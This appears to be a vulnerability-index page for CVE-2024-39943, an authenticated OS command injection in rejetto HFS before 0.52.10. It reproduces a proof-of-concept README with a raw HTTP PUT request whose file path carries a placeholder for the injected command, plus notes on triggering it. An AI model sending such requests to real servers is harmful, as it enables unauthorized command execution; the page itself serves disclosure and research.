POC details: 380a2007d836f67ad5b258d281963d3990c94ccf

Source
Related vulnerability
Title: rejetto HFS security vulnerability (CVE-2024-39943)
Description: rejetto HFS is a web-based file server written by the Italian independent developer Massimo Melina. Versions of rejetto HFS before 0.52.10 contain a vulnerability that allows an authenticated remote user to execute operating system commands.
Description
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
Introduction
# CVE-2024-39943-Poc
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Deploy:

```
./hfs --config config.yaml
```


## Poc: user admin
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b

## Poc: user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/cbb55ece-2c68-4ade-a09d-8b9bf3b961d8

## update 6/7/2024: Poc user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8

<!--Note:
The payload is the name of an existing directory. If the directory does not exist, you need to send the request twice. In the video, because a directory whose name contains the payload already exists on the HFS server, I only need to send the request once.

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a
-->
```
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

aaaaaaaaaaa
```
File snapshot

```
/data/pocs/380a2007d836f67ad5b258d281963d3990c94ccf
├── [ 199]  config.yaml
├── [ 23M]  hfs-linux.zip
├── [1.0K]  poc_user_admin.py
├── [ 705]  poc_user_guest.py
└── [1.5K]  README.md

0 directories, 5 files
```